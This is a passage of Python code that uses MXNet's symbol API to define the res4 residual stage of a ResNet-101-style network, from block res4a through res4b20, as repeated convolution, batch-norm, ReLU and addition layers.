use_global_stats=True, fix_gamma=False, eps=self.eps) scale4a_branch2c = bn4a_branch2c res4a = mx.symbol.broadcast_add(name='res4a', *[scale4a_branch1, scale4a_branch2c]) res4a_relu = mx.symbol.Activation(name='res4a_relu', data=res4a, act_type='relu') res4b1_branch2a = mx.symbol.Convolution(name='res4b1_branch2a', data=res4a_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b1_branch2a = mx.symbol.BatchNorm(name='bn4b1_branch2a', data=res4b1_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b1_branch2a = bn4b1_branch2a res4b1_branch2a_relu = mx.symbol.Activation(name='res4b1_branch2a_relu', data=scale4b1_branch2a, act_type='relu') res4b1_branch2b = mx.symbol.Convolution(name='res4b1_branch2b', data=res4b1_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b1_branch2b = mx.symbol.BatchNorm(name='bn4b1_branch2b', data=res4b1_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b1_branch2b = bn4b1_branch2b res4b1_branch2b_relu = mx.symbol.Activation(name='res4b1_branch2b_relu', data=scale4b1_branch2b, act_type='relu') res4b1_branch2c = mx.symbol.Convolution(name='res4b1_branch2c', data=res4b1_branch2b_relu, num_filter=1024, 
pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b1_branch2c = mx.symbol.BatchNorm(name='bn4b1_branch2c', data=res4b1_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b1_branch2c = bn4b1_branch2c res4b1 = mx.symbol.broadcast_add(name='res4b1', *[res4a_relu, scale4b1_branch2c]) res4b1_relu = mx.symbol.Activation(name='res4b1_relu', data=res4b1, act_type='relu') res4b2_branch2a = mx.symbol.Convolution(name='res4b2_branch2a', data=res4b1_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b2_branch2a = mx.symbol.BatchNorm(name='bn4b2_branch2a', data=res4b2_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b2_branch2a = bn4b2_branch2a res4b2_branch2a_relu = mx.symbol.Activation(name='res4b2_branch2a_relu', data=scale4b2_branch2a, act_type='relu') res4b2_branch2b = mx.symbol.Convolution(name='res4b2_branch2b', data=res4b2_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b2_branch2b = mx.symbol.BatchNorm(name='bn4b2_branch2b', data=res4b2_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b2_branch2b = bn4b2_branch2b res4b2_branch2b_relu = mx.symbol.Activation(name='res4b2_branch2b_relu', data=scale4b2_branch2b, act_type='relu') res4b2_branch2c = mx.symbol.Convolution(name='res4b2_branch2c', data=res4b2_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b2_branch2c = mx.symbol.BatchNorm(name='bn4b2_branch2c', data=res4b2_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b2_branch2c = bn4b2_branch2c res4b2 = mx.symbol.broadcast_add(name='res4b2', *[res4b1_relu, scale4b2_branch2c]) res4b2_relu = mx.symbol.Activation(name='res4b2_relu', data=res4b2, act_type='relu') res4b3_branch2a = mx.symbol.Convolution(name='res4b3_branch2a', data=res4b2_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b3_branch2a = mx.symbol.BatchNorm(name='bn4b3_branch2a', data=res4b3_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b3_branch2a = bn4b3_branch2a res4b3_branch2a_relu = mx.symbol.Activation(name='res4b3_branch2a_relu', data=scale4b3_branch2a, act_type='relu') res4b3_branch2b = mx.symbol.Convolution(name='res4b3_branch2b', data=res4b3_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b3_branch2b = mx.symbol.BatchNorm(name='bn4b3_branch2b', data=res4b3_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b3_branch2b = bn4b3_branch2b res4b3_branch2b_relu = mx.symbol.Activation(name='res4b3_branch2b_relu', data=scale4b3_branch2b, act_type='relu') res4b3_branch2c = mx.symbol.Convolution(name='res4b3_branch2c', data=res4b3_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b3_branch2c = mx.symbol.BatchNorm(name='bn4b3_branch2c', data=res4b3_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b3_branch2c = bn4b3_branch2c res4b3 = mx.symbol.broadcast_add(name='res4b3', *[res4b2_relu, scale4b3_branch2c]) res4b3_relu = mx.symbol.Activation(name='res4b3_relu', data=res4b3, act_type='relu') res4b4_branch2a = mx.symbol.Convolution(name='res4b4_branch2a', data=res4b3_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b4_branch2a = mx.symbol.BatchNorm(name='bn4b4_branch2a', data=res4b4_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b4_branch2a = bn4b4_branch2a res4b4_branch2a_relu = 
mx.symbol.Activation(name='res4b4_branch2a_relu', data=scale4b4_branch2a, act_type='relu') res4b4_branch2b = mx.symbol.Convolution(name='res4b4_branch2b', data=res4b4_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b4_branch2b = mx.symbol.BatchNorm(name='bn4b4_branch2b', data=res4b4_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b4_branch2b = bn4b4_branch2b res4b4_branch2b_relu = mx.symbol.Activation(name='res4b4_branch2b_relu', data=scale4b4_branch2b, act_type='relu') res4b4_branch2c = mx.symbol.Convolution(name='res4b4_branch2c', data=res4b4_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b4_branch2c = mx.symbol.BatchNorm(name='bn4b4_branch2c', data=res4b4_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b4_branch2c = bn4b4_branch2c res4b4 = mx.symbol.broadcast_add(name='res4b4', *[res4b3_relu, scale4b4_branch2c]) res4b4_relu = mx.symbol.Activation(name='res4b4_relu', data=res4b4, act_type='relu') res4b5_branch2a = mx.symbol.Convolution(name='res4b5_branch2a', data=res4b4_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b5_branch2a = mx.symbol.BatchNorm(name='bn4b5_branch2a', data=res4b5_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b5_branch2a = bn4b5_branch2a res4b5_branch2a_relu = mx.symbol.Activation(name='res4b5_branch2a_relu', data=scale4b5_branch2a, act_type='relu') res4b5_branch2b = mx.symbol.Convolution(name='res4b5_branch2b', data=res4b5_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b5_branch2b = mx.symbol.BatchNorm(name='bn4b5_branch2b', data=res4b5_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b5_branch2b = bn4b5_branch2b res4b5_branch2b_relu = mx.symbol.Activation(name='res4b5_branch2b_relu', data=scale4b5_branch2b, act_type='relu') res4b5_branch2c = mx.symbol.Convolution(name='res4b5_branch2c', data=res4b5_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b5_branch2c = mx.symbol.BatchNorm(name='bn4b5_branch2c', data=res4b5_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b5_branch2c = bn4b5_branch2c res4b5 = mx.symbol.broadcast_add(name='res4b5', *[res4b4_relu, scale4b5_branch2c]) res4b5_relu = mx.symbol.Activation(name='res4b5_relu', data=res4b5, act_type='relu') res4b6_branch2a = mx.symbol.Convolution(name='res4b6_branch2a', data=res4b5_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b6_branch2a = mx.symbol.BatchNorm(name='bn4b6_branch2a', data=res4b6_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b6_branch2a = bn4b6_branch2a res4b6_branch2a_relu = mx.symbol.Activation(name='res4b6_branch2a_relu', data=scale4b6_branch2a, act_type='relu') res4b6_branch2b = mx.symbol.Convolution(name='res4b6_branch2b', data=res4b6_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b6_branch2b = mx.symbol.BatchNorm(name='bn4b6_branch2b', data=res4b6_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b6_branch2b = bn4b6_branch2b res4b6_branch2b_relu = mx.symbol.Activation(name='res4b6_branch2b_relu', data=scale4b6_branch2b, act_type='relu') res4b6_branch2c = mx.symbol.Convolution(name='res4b6_branch2c', data=res4b6_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b6_branch2c = mx.symbol.BatchNorm(name='bn4b6_branch2c', 
data=res4b6_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b6_branch2c = bn4b6_branch2c res4b6 = mx.symbol.broadcast_add(name='res4b6', *[res4b5_relu, scale4b6_branch2c]) res4b6_relu = mx.symbol.Activation(name='res4b6_relu', data=res4b6, act_type='relu') res4b7_branch2a = mx.symbol.Convolution(name='res4b7_branch2a', data=res4b6_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b7_branch2a = mx.symbol.BatchNorm(name='bn4b7_branch2a', data=res4b7_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b7_branch2a = bn4b7_branch2a res4b7_branch2a_relu = mx.symbol.Activation(name='res4b7_branch2a_relu', data=scale4b7_branch2a, act_type='relu') res4b7_branch2b = mx.symbol.Convolution(name='res4b7_branch2b', data=res4b7_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b7_branch2b = mx.symbol.BatchNorm(name='bn4b7_branch2b', data=res4b7_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b7_branch2b = bn4b7_branch2b res4b7_branch2b_relu = mx.symbol.Activation(name='res4b7_branch2b_relu', data=scale4b7_branch2b, act_type='relu') res4b7_branch2c = mx.symbol.Convolution(name='res4b7_branch2c', data=res4b7_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b7_branch2c = mx.symbol.BatchNorm(name='bn4b7_branch2c', data=res4b7_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b7_branch2c = bn4b7_branch2c res4b7 = mx.symbol.broadcast_add(name='res4b7', *[res4b6_relu, scale4b7_branch2c]) res4b7_relu = mx.symbol.Activation(name='res4b7_relu', data=res4b7, act_type='relu') res4b8_branch2a = mx.symbol.Convolution(name='res4b8_branch2a', data=res4b7_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b8_branch2a = mx.symbol.BatchNorm(name='bn4b8_branch2a', data=res4b8_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b8_branch2a = bn4b8_branch2a res4b8_branch2a_relu = mx.symbol.Activation(name='res4b8_branch2a_relu', data=scale4b8_branch2a, act_type='relu') res4b8_branch2b = mx.symbol.Convolution(name='res4b8_branch2b', data=res4b8_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b8_branch2b = mx.symbol.BatchNorm(name='bn4b8_branch2b', data=res4b8_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b8_branch2b = bn4b8_branch2b res4b8_branch2b_relu = mx.symbol.Activation(name='res4b8_branch2b_relu', data=scale4b8_branch2b, act_type='relu') res4b8_branch2c = mx.symbol.Convolution(name='res4b8_branch2c', data=res4b8_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b8_branch2c = mx.symbol.BatchNorm(name='bn4b8_branch2c', data=res4b8_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b8_branch2c = bn4b8_branch2c res4b8 = mx.symbol.broadcast_add(name='res4b8', *[res4b7_relu, scale4b8_branch2c]) res4b8_relu = mx.symbol.Activation(name='res4b8_relu', data=res4b8, act_type='relu') res4b9_branch2a = mx.symbol.Convolution(name='res4b9_branch2a', data=res4b8_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b9_branch2a = mx.symbol.BatchNorm(name='bn4b9_branch2a', data=res4b9_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b9_branch2a = bn4b9_branch2a res4b9_branch2a_relu = mx.symbol.Activation(name='res4b9_branch2a_relu', data=scale4b9_branch2a, act_type='relu') res4b9_branch2b = 
mx.symbol.Convolution(name='res4b9_branch2b', data=res4b9_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b9_branch2b = mx.symbol.BatchNorm(name='bn4b9_branch2b', data=res4b9_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b9_branch2b = bn4b9_branch2b res4b9_branch2b_relu = mx.symbol.Activation(name='res4b9_branch2b_relu', data=scale4b9_branch2b, act_type='relu') res4b9_branch2c = mx.symbol.Convolution(name='res4b9_branch2c', data=res4b9_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b9_branch2c = mx.symbol.BatchNorm(name='bn4b9_branch2c', data=res4b9_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b9_branch2c = bn4b9_branch2c res4b9 = mx.symbol.broadcast_add(name='res4b9', *[res4b8_relu, scale4b9_branch2c]) res4b9_relu = mx.symbol.Activation(name='res4b9_relu', data=res4b9, act_type='relu') res4b10_branch2a = mx.symbol.Convolution(name='res4b10_branch2a', data=res4b9_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b10_branch2a = mx.symbol.BatchNorm(name='bn4b10_branch2a', data=res4b10_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b10_branch2a = bn4b10_branch2a res4b10_branch2a_relu = mx.symbol.Activation(name='res4b10_branch2a_relu', data=scale4b10_branch2a, act_type='relu') res4b10_branch2b = mx.symbol.Convolution(name='res4b10_branch2b', data=res4b10_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b10_branch2b = mx.symbol.BatchNorm(name='bn4b10_branch2b', data=res4b10_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b10_branch2b = bn4b10_branch2b res4b10_branch2b_relu = mx.symbol.Activation(name='res4b10_branch2b_relu', data=scale4b10_branch2b, act_type='relu') res4b10_branch2c = mx.symbol.Convolution(name='res4b10_branch2c', data=res4b10_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b10_branch2c = mx.symbol.BatchNorm(name='bn4b10_branch2c', data=res4b10_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b10_branch2c = bn4b10_branch2c res4b10 = mx.symbol.broadcast_add(name='res4b10', *[res4b9_relu, scale4b10_branch2c]) res4b10_relu = mx.symbol.Activation(name='res4b10_relu', data=res4b10, act_type='relu') res4b11_branch2a = mx.symbol.Convolution(name='res4b11_branch2a', data=res4b10_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b11_branch2a = mx.symbol.BatchNorm(name='bn4b11_branch2a', data=res4b11_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b11_branch2a = bn4b11_branch2a res4b11_branch2a_relu = mx.symbol.Activation(name='res4b11_branch2a_relu', data=scale4b11_branch2a, act_type='relu') res4b11_branch2b = mx.symbol.Convolution(name='res4b11_branch2b', data=res4b11_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b11_branch2b = mx.symbol.BatchNorm(name='bn4b11_branch2b', data=res4b11_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b11_branch2b = bn4b11_branch2b res4b11_branch2b_relu = mx.symbol.Activation(name='res4b11_branch2b_relu', data=scale4b11_branch2b, act_type='relu') res4b11_branch2c = mx.symbol.Convolution(name='res4b11_branch2c', data=res4b11_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b11_branch2c = mx.symbol.BatchNorm(name='bn4b11_branch2c', data=res4b11_branch2c, use_global_stats=True, 
fix_gamma=False, eps=self.eps) scale4b11_branch2c = bn4b11_branch2c res4b11 = mx.symbol.broadcast_add(name='res4b11', *[res4b10_relu, scale4b11_branch2c]) res4b11_relu = mx.symbol.Activation(name='res4b11_relu', data=res4b11, act_type='relu') res4b12_branch2a = mx.symbol.Convolution(name='res4b12_branch2a', data=res4b11_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b12_branch2a = mx.symbol.BatchNorm(name='bn4b12_branch2a', data=res4b12_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b12_branch2a = bn4b12_branch2a res4b12_branch2a_relu = mx.symbol.Activation(name='res4b12_branch2a_relu', data=scale4b12_branch2a, act_type='relu') res4b12_branch2b = mx.symbol.Convolution(name='res4b12_branch2b', data=res4b12_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b12_branch2b = mx.symbol.BatchNorm(name='bn4b12_branch2b', data=res4b12_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b12_branch2b = bn4b12_branch2b res4b12_branch2b_relu = mx.symbol.Activation(name='res4b12_branch2b_relu', data=scale4b12_branch2b, act_type='relu') res4b12_branch2c = mx.symbol.Convolution(name='res4b12_branch2c', data=res4b12_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b12_branch2c = mx.symbol.BatchNorm(name='bn4b12_branch2c', data=res4b12_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b12_branch2c = bn4b12_branch2c res4b12 = mx.symbol.broadcast_add(name='res4b12', *[res4b11_relu, scale4b12_branch2c]) res4b12_relu = mx.symbol.Activation(name='res4b12_relu', data=res4b12, act_type='relu') res4b13_branch2a = mx.symbol.Convolution(name='res4b13_branch2a', data=res4b12_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b13_branch2a = mx.symbol.BatchNorm(name='bn4b13_branch2a', data=res4b13_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b13_branch2a = bn4b13_branch2a res4b13_branch2a_relu = mx.symbol.Activation(name='res4b13_branch2a_relu', data=scale4b13_branch2a, act_type='relu') res4b13_branch2b = mx.symbol.Convolution(name='res4b13_branch2b', data=res4b13_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b13_branch2b = mx.symbol.BatchNorm(name='bn4b13_branch2b', data=res4b13_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b13_branch2b = bn4b13_branch2b res4b13_branch2b_relu = mx.symbol.Activation(name='res4b13_branch2b_relu', data=scale4b13_branch2b, act_type='relu') res4b13_branch2c = mx.symbol.Convolution(name='res4b13_branch2c', data=res4b13_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b13_branch2c = mx.symbol.BatchNorm(name='bn4b13_branch2c', data=res4b13_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b13_branch2c = bn4b13_branch2c res4b13 = mx.symbol.broadcast_add(name='res4b13', *[res4b12_relu, scale4b13_branch2c]) res4b13_relu = mx.symbol.Activation(name='res4b13_relu', data=res4b13, act_type='relu') res4b14_branch2a = mx.symbol.Convolution(name='res4b14_branch2a', data=res4b13_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b14_branch2a = mx.symbol.BatchNorm(name='bn4b14_branch2a', data=res4b14_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b14_branch2a = bn4b14_branch2a res4b14_branch2a_relu = mx.symbol.Activation(name='res4b14_branch2a_relu', data=scale4b14_branch2a, act_type='relu') 
res4b14_branch2b = mx.symbol.Convolution(name='res4b14_branch2b', data=res4b14_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b14_branch2b = mx.symbol.BatchNorm(name='bn4b14_branch2b', data=res4b14_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b14_branch2b = bn4b14_branch2b res4b14_branch2b_relu = mx.symbol.Activation(name='res4b14_branch2b_relu', data=scale4b14_branch2b, act_type='relu') res4b14_branch2c = mx.symbol.Convolution(name='res4b14_branch2c', data=res4b14_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b14_branch2c = mx.symbol.BatchNorm(name='bn4b14_branch2c', data=res4b14_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b14_branch2c = bn4b14_branch2c res4b14 = mx.symbol.broadcast_add(name='res4b14', *[res4b13_relu, scale4b14_branch2c]) res4b14_relu = mx.symbol.Activation(name='res4b14_relu', data=res4b14, act_type='relu') res4b15_branch2a = mx.symbol.Convolution(name='res4b15_branch2a', data=res4b14_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b15_branch2a = mx.symbol.BatchNorm(name='bn4b15_branch2a', data=res4b15_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b15_branch2a = bn4b15_branch2a res4b15_branch2a_relu = mx.symbol.Activation(name='res4b15_branch2a_relu', data=scale4b15_branch2a, act_type='relu') res4b15_branch2b = mx.symbol.Convolution(name='res4b15_branch2b', data=res4b15_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b15_branch2b = mx.symbol.BatchNorm(name='bn4b15_branch2b', data=res4b15_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b15_branch2b = bn4b15_branch2b res4b15_branch2b_relu = mx.symbol.Activation(name='res4b15_branch2b_relu', data=scale4b15_branch2b, act_type='relu') res4b15_branch2c = mx.symbol.Convolution(name='res4b15_branch2c', data=res4b15_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b15_branch2c = mx.symbol.BatchNorm(name='bn4b15_branch2c', data=res4b15_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b15_branch2c = bn4b15_branch2c res4b15 = mx.symbol.broadcast_add(name='res4b15', *[res4b14_relu, scale4b15_branch2c]) res4b15_relu = mx.symbol.Activation(name='res4b15_relu', data=res4b15, act_type='relu') res4b16_branch2a = mx.symbol.Convolution(name='res4b16_branch2a', data=res4b15_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b16_branch2a = mx.symbol.BatchNorm(name='bn4b16_branch2a', data=res4b16_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b16_branch2a = bn4b16_branch2a res4b16_branch2a_relu = mx.symbol.Activation(name='res4b16_branch2a_relu', data=scale4b16_branch2a, act_type='relu') res4b16_branch2b = mx.symbol.Convolution(name='res4b16_branch2b', data=res4b16_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b16_branch2b = mx.symbol.BatchNorm(name='bn4b16_branch2b', data=res4b16_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b16_branch2b = bn4b16_branch2b res4b16_branch2b_relu = mx.symbol.Activation(name='res4b16_branch2b_relu', data=scale4b16_branch2b, act_type='relu') res4b16_branch2c = mx.symbol.Convolution(name='res4b16_branch2c', data=res4b16_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b16_branch2c = mx.symbol.BatchNorm(name='bn4b16_branch2c', 
data=res4b16_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b16_branch2c = bn4b16_branch2c res4b16 = mx.symbol.broadcast_add(name='res4b16', *[res4b15_relu, scale4b16_branch2c]) res4b16_relu = mx.symbol.Activation(name='res4b16_relu', data=res4b16, act_type='relu') res4b17_branch2a = mx.symbol.Convolution(name='res4b17_branch2a', data=res4b16_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b17_branch2a = mx.symbol.BatchNorm(name='bn4b17_branch2a', data=res4b17_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b17_branch2a = bn4b17_branch2a res4b17_branch2a_relu = mx.symbol.Activation(name='res4b17_branch2a_relu', data=scale4b17_branch2a, act_type='relu') res4b17_branch2b = mx.symbol.Convolution(name='res4b17_branch2b', data=res4b17_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b17_branch2b = mx.symbol.BatchNorm(name='bn4b17_branch2b', data=res4b17_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b17_branch2b = bn4b17_branch2b res4b17_branch2b_relu = mx.symbol.Activation(name='res4b17_branch2b_relu', data=scale4b17_branch2b, act_type='relu') res4b17_branch2c = mx.symbol.Convolution(name='res4b17_branch2c', data=res4b17_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b17_branch2c = mx.symbol.BatchNorm(name='bn4b17_branch2c', data=res4b17_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b17_branch2c = bn4b17_branch2c res4b17 = mx.symbol.broadcast_add(name='res4b17', *[res4b16_relu, scale4b17_branch2c]) res4b17_relu = mx.symbol.Activation(name='res4b17_relu', data=res4b17, act_type='relu') res4b18_branch2a = mx.symbol.Convolution(name='res4b18_branch2a', data=res4b17_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b18_branch2a = mx.symbol.BatchNorm(name='bn4b18_branch2a', data=res4b18_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b18_branch2a = bn4b18_branch2a res4b18_branch2a_relu = mx.symbol.Activation(name='res4b18_branch2a_relu', data=scale4b18_branch2a, act_type='relu') res4b18_branch2b = mx.symbol.Convolution(name='res4b18_branch2b', data=res4b18_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b18_branch2b = mx.symbol.BatchNorm(name='bn4b18_branch2b', data=res4b18_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b18_branch2b = bn4b18_branch2b res4b18_branch2b_relu = mx.symbol.Activation(name='res4b18_branch2b_relu', data=scale4b18_branch2b, act_type='relu') res4b18_branch2c = mx.symbol.Convolution(name='res4b18_branch2c', data=res4b18_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b18_branch2c = mx.symbol.BatchNorm(name='bn4b18_branch2c', data=res4b18_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b18_branch2c = bn4b18_branch2c res4b18 = mx.symbol.broadcast_add(name='res4b18', *[res4b17_relu, scale4b18_branch2c]) res4b18_relu = mx.symbol.Activation(name='res4b18_relu', data=res4b18, act_type='relu') res4b19_branch2a = mx.symbol.Convolution(name='res4b19_branch2a', data=res4b18_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b19_branch2a = mx.symbol.BatchNorm(name='bn4b19_branch2a', data=res4b19_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b19_branch2a = bn4b19_branch2a res4b19_branch2a_relu = mx.symbol.Activation(name='res4b19_branch2a_relu', 
data=scale4b19_branch2a, act_type='relu') res4b19_branch2b = mx.symbol.Convolution(name='res4b19_branch2b', data=res4b19_branch2a_relu, num_filter=256, pad=(1, 1), kernel=(3, 3), stride=(1, 1), no_bias=True) bn4b19_branch2b = mx.symbol.BatchNorm(name='bn4b19_branch2b', data=res4b19_branch2b, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b19_branch2b = bn4b19_branch2b res4b19_branch2b_relu = mx.symbol.Activation(name='res4b19_branch2b_relu', data=scale4b19_branch2b, act_type='relu') res4b19_branch2c = mx.symbol.Convolution(name='res4b19_branch2c', data=res4b19_branch2b_relu, num_filter=1024, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b19_branch2c = mx.symbol.BatchNorm(name='bn4b19_branch2c', data=res4b19_branch2c, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b19_branch2c = bn4b19_branch2c res4b19 = mx.symbol.broadcast_add(name='res4b19', *[res4b18_relu, scale4b19_branch2c]) res4b19_relu = mx.symbol.Activation(name='res4b19_relu', data=res4b19, act_type='relu') res4b20_branch2a = mx.symbol.Convolution(name='res4b20_branch2a', data=res4b19_relu, num_filter=256, pad=(0, 0), kernel=(1, 1), stride=(1, 1), no_bias=True) bn4b20_branch2a = mx.symbol.BatchNorm(name='bn4b20_branch2a', data=res4b20_branch2a, use_global_stats=True, fix_gamma=False, eps=self.eps) scale4b20_branch2a = bn4b20_branch2a res4b20_branch2a_relu = mx.symbol.Activation(name='res4b20_branch2a_relu', 